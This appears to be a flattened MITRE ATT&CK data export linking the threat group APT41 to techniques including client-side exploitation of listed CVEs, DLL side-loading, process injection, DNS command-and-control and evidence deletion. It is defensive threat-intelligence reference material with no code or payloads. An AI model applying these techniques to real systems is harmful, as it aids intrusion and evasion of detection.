aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--bcbc885e-c1ae-4e69-a72c-22900403bae3
revoked : False
technique : Exploitation for Client Execution
technique_description : Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Several types exist:

### Browser-based Exploitation

Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

### Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

### Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1203
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Process: Process Creation', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used legitimate executables to perform DLL side-loading of their malware.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--ad3eae0f-becd-4ed8-94cf-40a4e1a06a9d
revoked : False
technique : DLL Side-Loading
technique_description : Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deleted files from the system.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--56b47ce2-9baa-421b-9187-c780615b97de
revoked : False
technique : File Deletion
technique_description : Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1070.004
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Command: Command Execution', 'File: File Deletion']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used compiled HTML (.chm) files for targeting.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--c4c08678-eee9-475c-9a67-67b15278ec54
revoked : False
technique : Compiled HTML File
technique_description : Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the Steam community page as a fallback mechanism for C2.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--97775c58-7cb1-46e0-9504-e60a459e44d0
revoked : False
technique : Fallback Channels
technique_description : Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1008
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--e0c1c9b9-b36e-4157-8dc1-26cd9ae25193
revoked : False
technique : Process Injection
technique_description : Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1055
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Access', 'Process: Process Modification', 'File: File Modification', 'Process: Process Metadata', 'File: File Metadata', 'Process: OS API Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used DNS for C2 communications.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) 
relationship_id : relationship--873faf92-be75-47e5-bf3e-b389a5bdc020
revoked : False
technique : DNS
technique_description : Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.004
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) collected MAC addresses from victim machines.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) 
relationship_id : relationship--adc6b431-0722-4287-8f37-e09ddb5b25fe
revoked : False
technique : System Network Configuration Discovery
technique_description : Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1016
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Script: Script Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
